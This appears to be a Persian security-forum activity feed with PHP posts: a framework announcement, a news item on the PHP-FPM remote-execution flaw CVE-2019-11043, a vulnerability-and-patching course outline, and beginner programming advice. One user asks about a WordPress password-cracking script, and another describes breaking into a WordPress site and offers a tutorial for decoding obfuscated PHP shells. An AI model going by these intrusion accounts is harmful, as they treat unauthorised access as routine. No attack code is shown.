دهنده قابلیت اینو داره که در هر جایی پروژه رد فریم ورکش رو با رد آنالیتیکس توسعه بده ! این ابزار سازگاری لازم با هر دو کیت رو داره رد جی اس رد فریم ورک تعامل جالبی رو با جاوا اسکریپت برای توسع دهندگان فراهم کرده است بنده به جهت نزدیک تر کردن رابطه Back End و Front End دست به توسعه یک فریم ورک جوا اسکریپتی بردم و در حال حاضر این فریم ورک به نسخه 1.0 خودش رسیده . از قابلیت های رد جی اس میتوان به موارد زیر اشاره کرد : پیروی از الگوی طراحی MVC کد نویسی درون تگ های HTML دسترسی آسان به المان و تغییر ویژگی آن ارسال درخواست AJAX مدیریت کوکی ها افکت گرافیکی سرویس ارزیابی ، فیلتر و زدودن رشته نصب و ساخت پروژه ساخت پروژه با کیت جامع از طریق کامپوزر : composer create-project redframework/enterprise ساخت پروژه با کیت کنسول اپلیکیشن از طریق کامپوزر : composer create-project redframework/console-kit ساخت پروژه از طریق ابزار رد آنالیتیکس : * ابزار رد آنالیتیکس در انتهای این پست ضمیمه شده است - مخزن گیت هاب برای توسعه دهندگان کیت جامع کیت کنسول رد جی اس هسته کیت جامع هسته کیت کنسول - لینک های مهم وبسایت رسمی (در دست طراحی) مستندات سوال و جواب های عمومی * هرگونه به روز رسانی و Patch Note در همین تاپیک پست خواهد شد . Red Analytics.jar Offline Docs (1.0).zip
  14. cloner2543

    آسیب پذیری جدید در php

    cloner2543 پاسخی ارسال کرد برای یک موضوع در باگ های امنیتی

    بچه ها این آسیب‌پذیری با شماره CVE-۲۰۱۹-۱۱۰۴۳ ردیابی میشه و به مهاجمان اجازه میده تا با دسترسی به یک URL ساخته شده، دستوراتی را روی سرورها اجرا کنن. بهره‌برداری از این آسیب‌پذیری به سادگی انجام میشه و کد اثبات مفهومی (PoC) اون به صورت عمومی توی گیت‌هاب منتشر شده و در دسترس همه هست اسکریپت PoC موجود در گیت‌هاب می‌تونه از طریق وب سرور مورد نظر، وجود آسیب‌پذیری رو بررسی کنه و وقتی که یک هدف آسیب‌پذیر شناسایی بشه، مهاجم میتونه به سرور وب آسیب‌پذیر، درخواست دستکاری شده ارسال کنه البته همه سرورهای مبتنی بر PHP تحت تأثیر قرار نمی‌گیرن و فقط سرورهای NGINX که ویژگی PHP-FPM اونا فعال باشه آسیب‌پذیر هستن
  15. rashvand
    **************** سلام با آموزش اولین فصل از دوره آموزشی لینوکس lpic-1 در خدمت شما دوستان عزیز هستم. قصد دارم قسمت به قسمت این دوره دوست داشتنی رو با هم یاد بگیریم و تبدیل به لینوکس کار حرفه ای شویم. پس همراه من باشید. ansible.pdf lpic-1.pdf
  16. MR.Moein
    سلام من میخام یه اسکریپت برای کرک پسورد وردپرس رو توی سیستمم اجرا کنم ولی ارور میده....اگه پسورد لیست با حجک کم بزارم مشکل حل میشه ولی دلیلش چیه!!! با تشکر
  17. DounRook

    کتاب فارسی آموزش زبان php

    DounRook پاسخی ارسال کرد برای یک موضوع در PHP

    این PDF محتوای آموزرش فارسی زبان php را در بر دارد php.pdf
  18. 1TED

    آموزش کامل طراحی وبسایت

    1TED پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری

    سلام دوستان عزیز یک مجموعه آموزش کامل طراحی وبسایت از آقای میلاد عباسی ! اول به صورت کامل HTML رو آموزش میده سپس میره سراغ طراحی قالب WordPress هر روز یک جلسه قرار خواهد گرفت و پسورد تمامی فایل ها guardiran.org خواهد بود ! لطفا به هیچ وجه پست ندید ! یا حـ ـق ../
  19. sali_ck

    سورس کد های php

    sali_ck پاسخی ارسال کرد برای یک موضوع در PHP

    با سلام و دورد سورس کد ربات ساخت بارکد توکن و ایدی ادمین را جایگزین کنید به دلخواه کلماتشم خواستید عوض کنید دانلود= MakeBarcode.php
  20. Phoen1X

    آموزش آسیب پذیری های PHP و نحوه پچ کردن

    Phoen1X پاسخی ارسال کرد برای یک موضوع در PHP

    به نام خدا در این تاپیک قصد دارم تا آموزش آسیب پذیری های PHP و نحوه پچ کردن اون هارو آموزش بدم پیش نیاز این تاپیک اسکریپتی هست که من برای تیم نوشتم(اینجا) و آشنایی ابتدایی با زبان php در این تاپیک سعی میکنم که آسیب پذیری هارو به صورت کامل یعنی اول برسی میکنیم که چطور این آسیب پذیری به وجود میاد بعد این که یک نفوذگر چطور با استفاده از این آسیب پذیری به وب سایت شما نفوذ می کنه و بعد هم نحوه پچ کردن اون آسیب پذیری. سر فصل آموزش ها : - SQL Injection - Blind SQL Injection - Authentication Bypass - File Upload - Stored Cross Site Scripting - Reflected Cross Site Scripting - Dom Cross Site Scripting - Cross Site Request Forgery - Remote File Inclusion - Local File Disclosure/Download - Remote Code Execution - Remote Command Execution تاپیک به مرور زمان آپدیت خواهد شد پس لطفا با اسپم های بی جا خرابش نکنین سوالی داشتید میتونید در پ.خ و یا در بخش مربوطه بپرسید
  21. Comrade
    با سلام بر ان شدیم تا یک تایپک جامع درباره از کجا باید برنامه‌ نویسی را شروع کنیم خدمتتان اراعه دهیم و پاسخ کلی دوستان تازه کاربرنامه نویس را داده باشیم تا جایی که امکان پذیر بوده است مطالب جامع و کامل جمع اوری شده اند قبل از ارسال پست قوانین را مطالعه فرمایید اصولا شما اگر برنامه نویس حرفه ای و یا معمولی باشید با این سوالات تکراری درزندگی روز مره مواجه خواهید شد بهترین زبان برنامه‌نویسی چیست؟ چقدر طول می‌کشد تا یه برنامه‌نویس خوب بشویم؟ میزان درآمد یک برنامه‌نویس چقدر است؟ تا چندسالگی می‌توانم برنامه‌نویسی کنم؟ برای برنامه‌نویس شدن حتما باید رشته‌ی دانشگاهی‌ام کامپیوتر باشد؟ اساسا چرا برنامه‌نویسی؟! ‌ قبل از هر چیزی با خودتان صادق باشید. چه چیزی باعث شد که تمایل پیدا کنید برنامه‌نویسی را یاد بگیرید؟ درآمد بالای برنامه‌نویسان، علاقه به کامپیوتر و مباحث پیشرفته‌ی آن، وجهه‌ی شخصیتی که برنامه‌نویسان در اجتماع دارند، نیاز به شغلی که بتوانید در خانه بمانید و پول در بیاورید، تغییر جهان یا حتی به فعلیت رساندن ایده‌هایتان. این‌ها همه دلایل بسیار خوبی برای شروع یادگیری برنامه‌نویسی هستند ولی شاید دلایل خوبی برای ادامه نباشند. برنامه‌نویسی نیاز به عشق، علاقه و پشتکار دارد. زندگی یک برنامه‌نویس با خطاها و انجام نشدن و زیر سوال رفتن مواردی که قبلا یاد گرفته، عجین است. در هر پروژه‌ای برنامه‌نویسان میزان زیادی از وقت‌شان را برای رفع خطاهای موجود در برنامه‌ی نوشته‌شده صرف می‌کنند و شاید روزها طول بکشد تا بفهمند مشکل کار تنها از یک غلط املایی بوده است یا هر چیز دیگری. پس به عنوان یک برنامه‌‌نویس نیاز به این خواهید داشت که واقعا صبور و باپشتکار باشید. باید قبول کنیم که برنامه‌نویسی کار ساده‌ای نیست. همین ساده نبودن برنامه‌نویسی، آن را خاص کرده است. نیازی نیست حتما در رشته‌ی کامپیوتر دارای تحصیلات باشید یا حتما سن‌تان بالای ۲۰ و کمتر از ۳۵ باشد. یا حتی نیاز نیست انسان بسیار باهوشی باشید یا ریاضی‌تان خیلی قوی باشد. ولی اگر همه‌ی این‌ها را داشته باشید، ممکن است در کنار دیگر برنامه‌نویسان از جایگاه بهتری برخوردار شوید. اگر پشتکار زیادی در یادگیری ندارید و همچنین اصلا حوصله‌ی درگیر شدن با مسائل سخت و پیچیده را ندارید از شما می‌خواهیم که دستتان را به کد آلوده نکنید و به سراغ مهارت‌های دیگری بروید. با شرکت در یک دوره‌ی برنامه‌نویسی یا خواندن یک کتاب جامع، شما یک برنامه‌نویس خواهید بود؛ برنامه‌نویس به این معنی که می‌توانید به مطالب گفته‌شده در آن کتاب یا آن دوره عمل کنید و بتوانید آن پروژه‌ها را از نو بنویسید. برای یادگیری اولیه‌ی برنامه‌نویسی زمان زیادی نیاز ندارید؛ ولی برای آنکه بتوانید آنچه را در ذهن‌ شما یا مشتری‌تان است انجام دهید به تجربه‌های زیادی نیاز دارید. در واقع، شما به تخصص‌های زیادی نیاز خواهید داشت که بسیاری از آن‌ها در هیچ کتاب یا آموزشگاهی ارایه نمی‌شوند. بعد از اینکه متوجه شدید که راه ساده‌ای در پیش ندارید و درصورتی‌که همچنان دوست دارید برنامه‌نویس شوید، باید تکلیف خود را روشن کنید و برای آینده‌تان تصمیم درستی بگیرید. این تصمیم آینده‌ی شما را تغییر خواهد داد. پس باید با خود صادق باشید و از روی احساس تصمیم نگیرید. کدام زبان های برنامه نویسی ارزش فراگیری دارند؟ PYTHON: جزو محبوب‌ترین زبان‌های برنامه‌نویسی دانشگاه‌های ایالات متحده امریکا است. توسعه‌دهندگان از پایتون برای ساخت اپلیکیشن‌های دسکتاپ و موبایل استفاده می‌کنند. همچنین پایتون گزینه‌ی بسیار مناسبی برای انجام فعالیت‌های داده کاوی (Data Mining) است.پایتون محبوبیت بالایی در جوامع علمی و دانشگاهی برای فعالیت در حوزه‌های تحلیل داده و بیوانفورماتیک دارد. از پایتون برای برنامه‌نویسی در ویندوز، مک و لینوکس می‌توان استفاده کرد. گوگل، دراپ باکس، پینترست، اینستاگرام، ردیت، بیت تورنت و Civilization IV شرکت‌هایی هستند که از پایتون در بسیاری از پروژه‌هایشان بهره می‌برند. PHP: یک زبان اسکریپتی سمت سرور و متن‌باز (Open Source) است. بسیاری از وب‌سایت‌هایی که روزانه از آن‌ها بازدید می‌کنید، به‌وسیله‌ی PHP ساخته شده‌اند. فیسبوک، یاهو، ویکی‌پدیا، تامبلر، وردپرس و بسیاری دیگر از سایت‌ها مواردی هستند که از PHP قدرت گرفته‌اند. PHP قواعد دستوری سختی ندارد که این موضوع باعث می‌شود به‌راحتی بتوانید آن را یاد بگیرید. جالب است به این نکته اشاره کنیم که شما از همان اولین روزهای یادگیری PHP می‌توانید پروژه‌های خوبی تولید کنید که باعث بالا رفتن روحیه‌تان برای ادامه‌ی کار می‌شود. C و ++C: از زبان برنامه نویسی C معمولا برای ساخت برنامه‌های سیستمی استفاده می‌شود. زبان برنامه‌نویسی C یک زبان قابل آمیخته شدن با سایر زبان‌ها در سیستم عامل است. ++C یک زبان قدرت‌‌گرفته از C است. از ++C در ساخت موتورهای بازی‌سازی، نرم‌افزارهای دسکتاپی، اپلیکیشن‌‌های موبایل و حتی نرم‌افزاری تحت وب می‌توان استفاده کرد. ++C بسیار سریع و قدرتمند است؛ طوری‌که فیسبوک از آن برای انجام پردازش‌های سنگین استفاده می‌کند.اگر شما درک خوبی از زبان C داشته باشید در یادگیری سایر زبان‌های برنامه‌نویسی مشکلی نخواهید داشت. ازآنجاکه هنگام برنامه‌نویسی به زبان ++C / C برای انجام یک فعالیت ساده نیاز است که مقدار کد زیادی نوشته شود، بسیاری از برنامه‌نویسان مبتدی روحیه‌شان را در ابتدای کار از دست می‌دهند. فراموش نکنید که یادگیری C‌ یا ++C درک خوبی از منطق برنامه‌نویسی به شما می‌دهد. بنابراین اگر در ابتدای کار هستید به شما پیشنهاد می‌کنیم که برای داشتن درک خوب از برنامه‌نویسی مدتی روی یادگیری ++C / C وقت بگذارید ولی انتظار ساخت نرم‌افزارهای حرفه‌ای را نداشته باشید. #C: محصولی از شرکت مایکروسافت و بر پایه‌ی فریم‌ورک «دات نت» (.net) است. از #C برای برنامه‌نویسی تحت وب (به‌وسیله‌ی ASP)، ساخت بازی‌های کامپیوتری و ساخت نرم‌افزارهای دسکتاپی می‌توان استفاده کرد.اگرچه در گذشته #C یک زبان چندسکویی نبوده ولی هم‌اکنون به کمک پروژه‌ای تحت عنوان Mono که به‌وسیله‌ی شرکت «زامارین» (Xamarin) ارایه شده، می‌توان از #C برای برنامه‌نویسی اندروید و iOS هم استفاده کرد. SQL: در ایران زیاد به عنوان یک زبان برنامه‌‌نویسی یاد نمی‌شود و صرفا مهارتی الزامی در کنار سایر مهارت‌ها به شمار می‌رود. ولی با رشد اهمیت موضوعاتی مانند بزرگ‌ داده‌ها (Big Data) ترجیح‌مان بر این بود که SQL هم در این لیست قرار گیرد.از SQL برای کار روی پایگاه‌های داده در محیط‌‌‌های مختلف می‌توان استفاده کرد. تقریبا در هر زمینه‌ی برنامه‌‌نویسی که بخواهید کار کنید، برای ذخیره‌‌سازی اطلاعات‌تان در پایگاه داده به SQL نیاز خواهید داشت. یادگیری SQL بسیار سریع و لذت‌بخش است. با یادگیری این زبان و حرفه‌ای شدن در آن می‌توانید به عنوان یک مدیر پایگاه داده کار کنید. JAVA: زبانی چندسکویی (Cross-Platform) و مستقل از سیستم‌ عامل است که ویژگی‌هایی مانند امنیت و قابلیت استفاده در پلتفرم‌های مختلف را برای توسعه‌دهندگانش به ارمغان می‌آورد. از جاوا برای ساخت اپلیکیشن‌های اندروید، برنامه‌های دسکتاپی و بازی‌ها می‌توان استفاده کرد.جاوا زبانی کلاسیک و ریشه‌دار است که به‌خوبی از پس انجام پروژه‌های نرم‌افزاری بزرگ (Enterprise) برمی‌آید. علاوه‌براین «هدوپ» (Hadoop) یک فریم‌‌ورک تحت جاوا برای انجام پردازش روی داده‌های بزرگ (Big Data) است که در وب‌سرویس‌های یاهو، فیسبوک و آمازون مورد استفاده قرار می‌گیرد. بنابراین چه بخواهید برای تلفن همراهتان اپلیکیشن بسازید و چه بخواهید روی الگوریتم‌های پیچیده کار کنید، جاوا یک همراه خوب برای شما خواهد بود. JAVVA SRIPT: بسیاری از کاربران جاوا اسکریپت و جاوا را با هم اشتباه می‌گیرند. جاوا اسکریپت یک زبان کاملا مستقل و جدا از جاوا است. وجود نام جاوا در ابتدای جاوا اسکریپت تنها یک شباهت اسمی است. جاوا اسکریپت در درجه‌ی اول یک زبان اسکریپتی سمت کاربر برای وب است که از آن برای توسعه‌ی رابط کاربری استفاده می‌شود. برنامه‌های وب در زبان‌های سمت کاربر روی کامپیوتر کاربر اجرا و از منابع سیستمی مثل رم و CPU کاربر استفاده می‌کنند.تا مدتی پیش از جاوا اسکریپت تنها در وب‌سایت‌ها برای انجام برخی رویداد‌های سمت کاربر (رویدادهایی که در مرورگر وب اجرا می‌شوند) استفاده می‌شد. بعد از مدتی پای فریم‌وُرک‌ها در جاوا اسکریپت باز شد و کارها با سادگی و سرعت هرچه‌تمام‌تر انجام پذیرفت. درواقع قبل از ورود فریم‌ورک‌ها در جاوا اسکریپت، ساخت وب اپلیکیشن‌ها هیچ‌گاه‌ به این سادگی نبود. ساخت وب اپلیکیشن‌ها به‌وسیله‌ی کتابخانه‌هایی مانند jQuery ،AngularJS ،Ember.js ،React و غیره انجام می‌شود. کدام راه برای یادگیری بهتر است ؟ شاید از هر کسی که اکنون برنامه نویس است بپرسید با چه روشی توانسته برنامه نویسی را یاد بگیرد به شما جواب های متفاوتی بدهند. بعضی ها روی کتاب تاکید دارند چون معتقند بسیار منسجم است مخالفان نیز یادگیری از روی کتاب را واقعا خسته کننده میدانند. عده ای هم اینترنت را بهترین استاد می دانند چون اعتقاد دارند هرچیزی درآن یافت میشود مخالفان نیز میگوید اینترنت در واقع انبوهی از اطلاعات است که می تواند شما را سردرگم کند همچنین هرکسی می تواند آنها را تولید کرده باشد و معتبر نباشد. یک عده هم رفتن به کلاس های برنامه نویسی رو به دلیل پروژه محور بودند پیشنهاد میدهد، مخالفان این روش یادگیری را استاد محور و متکی به دانش مدرس میدانند. فیلم های آموزشی شرکت های معتبر آموزشی هم روشی که است که بعضی ها پیشنهاد می دهد که در اینجا مخالفان حرفی برای گفتند ندارند. چون تمام ویژگی های خوب روش های قبلی را باهم دارد: منسجم است، بهترین اساتید جهان مدرس آنهایند، ارزان قیمت است و پروژه محور هستند. روشی را برای یادگیری برنامه نویسی انتخاب کنید که ساده باشد و باعث شود از یادگیری لذت ببرید. اگر از من بپرسید چه روشی را برای یادگیری برنامه نویسی پیشنهاد میدهم بدون شک اولین گزینه من دیدن فیلم های آموزشی شرکت های معتبر است. دلایلم هم این است: بهترین اساتید دنیا و زیر نظر معتبرترین شرکت های آموزشی آنها را تهیه و تولید کرده اند. پروژه محور هستند. کامل و منسجم هستند، میتواند یک دوره کامل از معرفی ابزارهای مورد نیاز تا ساخت یک پروژه را در بر بگیرند و در کل دیدن فیلم از خواندن متن لذت بخش تر است. اکثر برنامه‌نویسانی که در اطراف‌تان می‌بینید، اولین برنامه‌ای که موفق به نوشتن‌‌اش شدند، برنامه‌ی ساده ای بوده است که صرفا یک پیغام کوتاه روی نمایشگر نمایش می‌دهد. اگر از روی یک کتاب یا هرچیز مشابه آن اقدام به یادگیری برنامه‌نویسی می‌کنید، تمام تمرین‌های خواسته‌شده را حتی اگر شده با تقلب کردن از دیگران، انجام دهید. سپس کمی خلاقیت خرج دهید و آن را به سبک خودتان بازنویسی کنید.پس از آنکه کمی در کار خود پیشرفت کردید سعی کنید با چیزهایی که بلدید یک برنامه بنویسید. برای خودتان یک پروژه تعریف کنید و تمام تلاش‌تان را کنید که آن پروژه را با کیفیت بالا انجام دهید. همچنین می‌توانید با استفاده از سایت‌هایی مثل سورس فروج کدهای سایر برنامه‌نویسان را به‌رایگان دریافت کنید و ببینید آن‌ها چگونه آن برنامه را نوشته‌اند و سپس خودتان را با آن‌ها مقایسه کنید. یکی از کارهای پسندیده‌ای که برنامه‌نویسان حرفه‌ای انجام می‌دهند انتشار کدهای نوشته‌شده‌شان در محیط اینترنت است. این کار باعث می‌شود که در ابتدا برنامه‌نویسان مبتدی بتوانند تجربیاتی از کدهای آن‌ها کسب کنند. برنامه‌نویسان حرفه‌ای و نیمه‌حرفه‌ای هم می‌توانند برنامه‌هایشان را از این طریق توسعه داده و آن‌ها را به برنامه‌های بهتری تبدیل کنند. سایت گیت هاب یکی از وب‌سایت‌های بسیار معروف در این زمینه است که با جست‌وجو در آن می‌توانید پروژه‌های انجام شده به‌وسیله‌ی سایر برنامه‌نویسان را مشاهده و دانلود کنید. شما می‌توانید برنامه‌ها را توسعه دهید و دوباره منتشر کنید. حتی می‌توانید به برنامه‌ای قابلیت جدیدی اضافه کنید.اگر تا به اینجای کار هنوز پروژه‌ای برای دوستان یا آشنایان‌تان انجام نداده‌اید و کمی استرس دارید که شاید از پس پروژه‌های تجاری برنیایید، به شما پیشنهاد می‌کنم با جست‌وجوی ساده در گوگل (البته به زبان انگلیسی) در انجام پروژه‌ای داوطلبانه شرکت کنید. پروژه‌های داوطلبانه معمولا به‌وسیله‌ی چند نفر با تخصص‌های مشابه و شاید هم متفاوت انجام می‌شوند و از آن‌ها درآمدی عاید شما نمی‌شود. برنامه‌نویسی برای بیمارستان‌ها، خیریه‌ها و سایر موسسات غیرانتفاعی از نمونه پروژه‌های داوطلبانه هستند که در انتهای پروژه شما چند دوست خارجی، مقدار زیادی اعتماد‌به‌نفس و یک نمونه کار دارید.
  22. Comrade

    اموزش زبان برنامه نویسی PHP

    Comrade پاسخی ارسال کرد برای یک موضوع در PHP

    با سلام در این تایپک می پردازیم به اموزش زبان برنامه نویسی PHP اموزش ها در سطح مقدماتی می باشد هر گونه سوال و یا مشکلی بود در پ.خ(پیام خصوصی) در خدمت هستم اموزش ها اختصاصی تیم امنیتی گارد ایران می باشد کیفیت قسمت ها: خوب صدا: دارد زبان: فارسی پسورد: guardiran.org
  23. k.shadow
    سلام خدمت همه دوستان گارد ایران امروز اموزش دیکد کردن فایل های php رو براتون اماده کردم در اصل خودم وقتی به یک سایت wordpress ی نفوذ کردم کانفیگش کد شده بود وقتی اونو دیکد کردم به فکرم رسید اموزش دیکد کردن فایل های php رو براتون اماده کنم ) که حتی شلر هارو هم بتونید باهش دیکد کنید نکته اینجا هست که بتونیم کد برعکس عمل اینکد شده رو بنویسیم چون php اوپن سورس هست پس میشه فهمید چجوری دیتا ها کد میشن و چجوری توسط خود php دیکد میشن من رو لوکال هساست نتونستم تست کنم رو هاست رایگان گذاشتم چون iis ارور داد !!! احتمالا با wamp بشه php decod.part1.rar php decod.part2.rar php decod.part3.rar پیروز باشید ....
  24. Teodor

    PHP bOOks

    Teodor پاسخی ارسال کرد برای یک موضوع در PHP

    سلام... در این بخش کتاب های اموزش php قرار داده میشود لطفا کسانی ک کتابی در این زمینه دارند کمک کنند ممنون خودم 3 تا کتاب به زبان فارسی میزارم: 1:: دانلود حجم : 2.55 مگابایت 2:: دانلود حجم : 4.31 مگابایت 3:: دانلود حجم : 3.54 مگابایت
  25. ali_looloo
    دوستان سوالات PHP رو میتونید اینجا بپرسید اولین سوال اینه : من هنوز دقیق نمیدونم چه موقع از Return و چ موقع از Echo برای نمایش مقدار در یک تابع استفاده میشه ؟! توی مثال های مختلف فرق میکنه و بعضیا با Echo اشتباه درمیان یا برعکس با return نمیشه ... لطفا کسی اگه میدونه کابرداشون دقیقا چ فرقی داره بگه ..
×
×
  • ایجاد مورد جدید...